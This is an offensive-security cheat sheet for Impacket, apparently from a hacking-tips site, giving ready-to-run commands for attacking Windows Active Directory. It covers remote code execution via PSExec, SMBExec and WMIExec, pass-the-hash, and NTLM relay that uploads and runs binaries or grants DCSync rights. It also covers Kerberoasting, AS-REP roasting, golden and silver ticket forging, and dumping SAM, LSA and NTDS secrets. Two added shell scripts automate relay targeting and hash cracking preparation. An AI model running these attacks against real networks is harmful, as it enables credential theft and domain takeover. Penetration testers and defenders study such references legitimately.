active-directory

Impacket — Windows & Active Directory Attacks

Impacket is a Python library and a collection of command-line tools for SMB, MSRPC, Kerberos, NTLM, WMI, and Active Directory attacks. In the commands below, domain/user:password@target, NTLMhash, S-1-5-21-xxx and the 10.10.10.x addresses are placeholders to replace with your own values.

Apr 2026 lazyhackers
Authentication & Relay (9)
impacket-psexec domain/user:password@target
PSExec — get SYSTEM shell via SMB (needs local admin; uploads a service binary to ADMIN$ and creates a service, so it is noisy on the target)
psexec smb rce
impacket-psexec domain/user@target -hashes :NTLMhash
PSExec with pass-the-hash (-hashes takes LMhash:NThash; the LM half can be left empty, hence the leading colon)
psexec pth hash
impacket-smbexec domain/user:password@target
SMBExec — alternative to PSExec: no binary upload, each command runs through a short-lived service that launches cmd.exe and the output is read back from a file on a share
smbexec smb
impacket-wmiexec domain/user:password@target
WMIExec — code exec via WMI (Win32_Process.Create, no service created); runs as the authenticated user rather than SYSTEM, output is read back over ADMIN$
wmiexec wmi
impacket-wmiexec domain/user@target -hashes :NTLMhash
WMIExec pass-the-hash
wmiexec pth
impacket-ntlmrelayx -tf targets.txt -smb2support
NTLM relay to target list (default action: dump the SAM of each target via secretsdump). SMB targets must not require signing, and an authentication can never be relayed back to the host it came from. Collect authentications with Responder (its own SMB/HTTP servers switched off) or a coercion technique
ntlmrelayx relay smb
impacket-ntlmrelayx -tf targets.txt -smb2support -i
NTLM relay — interactive SMB shell (relayed sessions are kept open; connect with nc to the local port it prints, 127.0.0.1:11000 for the first one)
ntlmrelayx relay shell
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
NTLM relay — upload and execute a binary on the target (the relayed user must be a local admin there)
ntlmrelayx relay rce
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
Relay to LDAP for privilege escalation: grants compromised_user DCSync (replication) rights when the relayed account is a Domain/Enterprise Admin or can otherwise write the domain object's ACL. Needs LDAP signing not enforced on DC01, and the authentication must come from HTTP/WebDAV: SMB clients negotiate signing, so SMB-originated NTLM cannot be relayed to LDAP
ntlmrelayx ldap privesc
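Added example, not code from Impacket or from this cheatsheet's author: a small POSIX shell helper that turns an SMB-signing survey into the targets.txt that -tf reads, dropping hosts that require signing and the relay box itself. The survey format (host,required / host,not-required), the hosts and the attacker address are all constructed for the example; produce the survey from whatever scanner you use.

```shell
#!/bin/sh
# Added example, not part of the Impacket project: build targets.txt for
# impacket-ntlmrelayx -tf from an SMB-signing survey.
#
# Input format is constructed for this example: one "host,required" or
# "host,not-required" line per host, duplicates allowed.
SURVEY='10.10.10.5,not-required
10.10.10.6,required
10.10.10.7,not-required
10.10.10.5,not-required
10.10.10.20,required
10.10.10.99,not-required'

# Our own address (made up). An NTLM authentication cannot be relayed back
# to the host it came from, so listing ourselves only wastes a session.
ATTACKER_IP="10.10.10.99"

# relay_targets SURVEY SELF
# Prints one "smb://host" line per host that does NOT require SMB signing,
# deduplicated and with SELF removed. A relayed session cannot produce a
# valid signature, so hosts that require signing only yield failed attempts.
relay_targets() {
    printf '%s\n' "$1" | awk -F, -v self="$2" '
        NF == 2 && $2 == "not-required" && $1 != self && !seen[$1]++ {
            print "smb://" $1
        }'
}

# signing_required SURVEY: the hosts that were dropped, so you know which
# ones to approach through another protocol (LDAP, MSSQL) instead.
signing_required() {
    printf '%s\n' "$1" | awk -F, '
        NF == 2 && $2 == "required" && !seen[$1]++ { print $1 }'
}

# write_targets SURVEY SELF FILE: write the list and fail on an empty
# result, because ntlmrelayx started with an empty -tf just sits there.
write_targets() {
    relay_targets "$1" "$2" > "$3"
    [ -s "$3" ]
}

# Usage on the relay box:
#   write_targets "$SURVEY" "$ATTACKER_IP" targets.txt \
#     && impacket-ntlmrelayx -tf targets.txt -smb2support
relay_targets "$SURVEY" "$ATTACKER_IP"
```

The protocol prefix matters: ntlmrelayx accepts smb://, ldap://, mssql:// and others in the same file, so a survey that also records LDAP signing or channel-binding status can be mapped to ldap:// lines with the same awk pattern.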
Kerberos Attacks (6)
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request
Kerberoasting — list accounts with an SPN and request a TGS for each, printed as crackable hashes (any domain user can do this; add -outputfile to save them; hashcat -m 13100 for the usual RC4 tickets, 19700 if you get etype 18)
kerberoast kerberos spn
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
AS-REP Roasting — try each listed user without credentials; accounts with "Do not require Kerberos preauthentication" set return an AS-REP you can crack (hashcat -m 18200)
asrep kerberos roasting
impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1
AS-REP Roast all domain users: enumerates accounts without pre-auth over LDAP. Credential-less, this only works if the DC allows anonymous LDAP binds, which is off by default; normally run it as domain.local/user:password with -request to enumerate and pull the AS-REPs in one go
asrep kerberos
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
Forge Silver Ticket for one service: -nthash is the NT hash of the account the service runs as (the machine account for cifs/); writes user.ccache and never contacts the DC
silver-ticket kerberos forge
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
Forge Golden Ticket (krbtgt NT hash needed; the domain SID comes from lookupsid); writes administrator.ccache
golden-ticket kerberos forge
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
Pass-the-Ticket: use .ccache for auth. The target must be the hostname/FQDN matching the ticket's SPN, not an IP; add -target-ip if the name does not resolve
ptt kerberos ticket
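Added example, not code from Impacket or from this cheatsheet: a POSIX shell helper that sorts the hashes printed by GetUserSPNs -request and GetNPUsers into one file per hashcat mode, because the encryption type in each hash decides the mode and a mixed file makes hashcat reject the lines it was not told about. The sample output below is constructed; the hex blobs are shortened placeholders, not real ticket material.

```shell
#!/bin/sh
# Added example, not part of Impacket: split Kerberoast / AS-REP roast
# output from impacket-GetUserSPNs and impacket-GetNPUsers by hashcat mode.

# Constructed sample output: the table header GetUserSPNs prints before the
# hashes, one RC4 TGS, one AES-256 TGS (that account has RC4 disabled) and
# one AS-REP. Hex fields are placeholders, not real ticket material.
ROAST_SAMPLE='ServicePrincipalName  Name     MemberOf  PasswordLastSet  LastLogon  Delegation
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$domain.local/svc_sql*$0123456789abcdef0123456789abcdef$00112233aabbccdd
$krb5tgs$18$svc_web$DOMAIN.LOCAL$*http/web.domain.local*$00112233aabbccdd$0123456789abcdef
$krb5asrep$23$jdoe@DOMAIN.LOCAL:0123456789abcdef0123456789abcdef$00112233aabbccdd'

# roast_mode HASH: hashcat mode for one Impacket roast hash, or "unknown"
# for anything that is not a hash (table headers, [*] status lines).
roast_mode() {
    case "$1" in
        '$krb5tgs$23$'*)   echo 13100 ;;   # Kerberoast, RC4-HMAC (etype 23)
        '$krb5tgs$17$'*)   echo 19600 ;;   # Kerberoast, AES128 (etype 17)
        '$krb5tgs$18$'*)   echo 19700 ;;   # Kerberoast, AES256 (etype 18)
        '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP roast, RC4-HMAC (etype 23)
        *)                 echo unknown ;;
    esac
}

# split_roast OUTDIR: read Impacket output on stdin and append every hash
# to OUTDIR/hashcat_<mode>.txt; lines that are not hashes are skipped.
# Hashes are kept whole: hashcat needs the full line, including the
# *user$realm$spn* part, to parse them.
split_roast() {
    while IFS= read -r line; do
        mode=$(roast_mode "$line")
        if [ "$mode" != unknown ]; then
            printf '%s\n' "$line" >> "$1/hashcat_$mode.txt"
        fi
    done
}

# Usage:
#   impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request \
#     | split_roast ./roast
#   hashcat -m 13100 roast/hashcat_13100.txt wordlist.txt

# Demo on the constructed sample: one file per mode appears in the temp dir.
demo_dir=$(mktemp -d)
printf '%s\n' "$ROAST_SAMPLE" | split_roast "$demo_dir"
ls "$demo_dir"
```

AES tickets (etype 17/18) show up when RC4 is disabled for the service account; they crack far slower than 13100, so check the file split before committing GPU time.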
Credential Dumping (4)
impacket-secretsdump domain/user:password@target
Dump SAM, LSA secrets and cached domain creds remotely (needs local admin on the target; against a DC it also pulls the NTDS via DCSync)
secretsdump creds dump
impacket-secretsdump domain/user@target -hashes :NTLMhash
secretsdump with pass-the-hash
secretsdump pth
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Offline NTDS.dit dump from local copies of ntds.dit and the SYSTEM hive (for example from a VSS or ntdsutil backup)
secretsdump ntds offline
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
DCSync — dump all domain NTLM hashes via DRSUAPI replication. Needs replication rights: Domain Admins, or any account granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. -just-dc adds Kerberos keys, -just-dc-user target_user limits it to one account
dcsync ntlm da
Enumeration & SMB (7)
impacket-smbclient domain/user:password@target
Interactive SMB client (shares, use, ls, get, put)
smb enum
impacket-smbclient domain/user@target -hashes :NTLMhash
SMB client with pass-the-hash
smb pth
impacket-lookupsid domain/user:password@target
Enumerate users/groups via SID bruteforce (RID cycling over LSARPC); also prints the domain SID that ticketer needs
enum sid users
impacket-rpcdump domain/user:password@target
Dump RPC endpoints from the endpoint mapper (shows which interfaces, e.g. the print spooler, a host exposes)
rpc enum
impacket-reg domain/user:password@target query -keyName "HKLM\SAM"
Remote registry query (needs the RemoteRegistry service on the target). The subkeys under HKLM\SAM are readable only by SYSTEM, so this shows almost nothing even as admin: use secretsdump for hashes, and query keys such as HKLM\SYSTEM\CurrentControlSet\Control\Lsa for settings
registry enum
impacket-mssqlclient domain/user:password@target
MSSQL interactive client (SQL login)
mssql database
impacket-mssqlclient domain/user:password@target -windows-auth
MSSQL with Windows auth (authenticate as a domain or local Windows account instead of a SQL login)
mssql windows-auth